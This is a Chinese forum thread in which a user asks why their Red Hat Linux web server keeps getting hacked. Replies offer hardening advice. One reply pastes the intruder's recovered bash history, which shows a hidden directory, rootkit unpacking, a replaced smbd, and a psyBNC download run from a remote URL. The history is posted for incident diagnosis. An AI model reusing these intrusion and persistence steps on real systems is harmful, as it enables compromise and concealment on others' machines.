我的linux为什么这么不安全？？？

Question

大家好，请各位linux的高手帮助我一下。我的linux网站2个月中3次被黑，希望大家帮我补洞。
   我的linux配置 linux8.0
          开的服务   22(ssh)     53 (dns)    80 (http)    443 (https)
            3306 (mysql)    6000 (xwindows)  16888 (webmin)
就只有这些了。

Answer 1

换个 OpenBSD 吧!

Answer 2

呵呵，你的防火墙没配置好吧

Answer 3

估计是你没及时打补丁！

Answer 4

被黑后什么现象？针对问题考虑补救办法

Answer 5

文件被改，变成红色一闪一闪的，日志被删，只有内存里留下了一点命令的历史记录。

  486  ifconfig
  487  ping 196.165.163.89
  488  cd /lib/.libgh-gh
  489  ls
  490  tar -xzf illusion.tar.gz
  491  tar -xzf illusion*
  492  ls
  493  cd illusion*
  494  ls
  495  emacs Makefile
  496  ps aux
  497  ./illusion 217.133.154.218 off
  498  ls
  499  cd ..
  500  ls
  501  tar -xzf AjaKit*
  502  wget ftp://wuarchive.wustl.edu/mirrors/gnu/gzip/gzip-1.2.4.tar
  503  ls
  504  tar -xzf gzip*
  505  rm -rf gzip*
  506  wget ftp://tron.um.u-tokyo.ac.jp/pub/GNU/prep/gzip/gzip-1.2.4.tar
  507  rm -rf gzip*
  508  wget ftp://ftp.ring.gr.jp/pub/GNU/gzip/gzip-1.2.4.tar
  509  ls
  510  tar -xf gzip*
  511  cd gzip*
  512  ls
  513  ./configure
  514  make
  515  make install
  516  cd ..
  517  tar -xzf AjaKit*
  518  ls
  519  rm -rf AjaKit
  520  tar -xzf AjaKit*
  521  ls
  522  gzip -V
  523  tar -xzf AjaKit*
  524  tar -xzf AjaKit.tar.gz
  525  ls
  526  rm -rf AjaKit
  527  ls
  528  rm -rf gzip*
  529  ls
  530  tar -xzf samba*
  531  cd samba
  532  cd samba*
  533  ls
  534  less README
  535  cd source
  536  ls
  537  ./configure
  538  make
  539  ps aux |grep sshd
  540  ps aux |grep smbd
  541  make install
  542  cd ..
  543  cd ..
  544  ls
  545  ifconfig
  546  ps aux |grep smbd
  547  kill -9 685
  548  ps aux |grep smbd
  549  kill -9 8778
  550  w
  551  ps aux |grep smbd
  552  smbd -D
  553  ls  
  554  wget http://members.xoom.virgilio.it/sp2000/ORDEX/IRC/BNC/psyBNC2.3.1.tar.gz
  555  tar -xzf psy*
  556  cd psyb*
  557  make menuconfig
  558  make
  559  ls
  560  ps aux
  561  ./psybnc
  562  ls
  563  vi psybnc.conf
  564  ./psybnc
  565  ps aux
  566  exit
  567  exit
  568  cd /lib/.libgh-gh
  569  ls
  570  rm -rf *.tar.gz
  571  ls
  572  cd psy*
  573  ls
  574  mv salt.h salt.h.bak
  575  cd ..
  576  ls
  577  rm -rf ill*
  578  rm -rf sam*
  579  ls
  580  exit
  在这之后他又从 ftp://games:1@61.133.87.162/下载了一个rootkit和smbar编译安装了。

Answer 6

建议
关掉xwindow webmin
开启最小服务
如果你用的是php ＋ mysql ＋apache做网页
如果条件允许的话，可以把数据库服务器和apache服务器分开
在apache服务中通过php程序访问mysql服务器，并且只允许你的apache服务器访问
你的服务器如果是托管，建议不用开启DNS服务
还要重要的一点，不要用rh自带的apache和ssh
从网上下一些tar包自己编译
像apache服务器上只开ssh、net、apache端口
用iptables屏蔽其他所以的IP（除了公司或者客户）访问

Answer 7

机器在本地，我用的也是rd自带的软件，我处了上面提到的端口其他什么也没开，我想知道他是怎么得到我的root帐户的？？我的机器还是一个dns的接点服务器，除了6000和16888 其他的都不能关的，而且我也没有其他的服务器来做mysql的服务，只能先放到一起。

Answer 8

你的root口令强吗，要用md5的方法。
山掉wget，把root改个名字。
把ssh打上补丁

Answer 9

请帖出你使用软件的版本号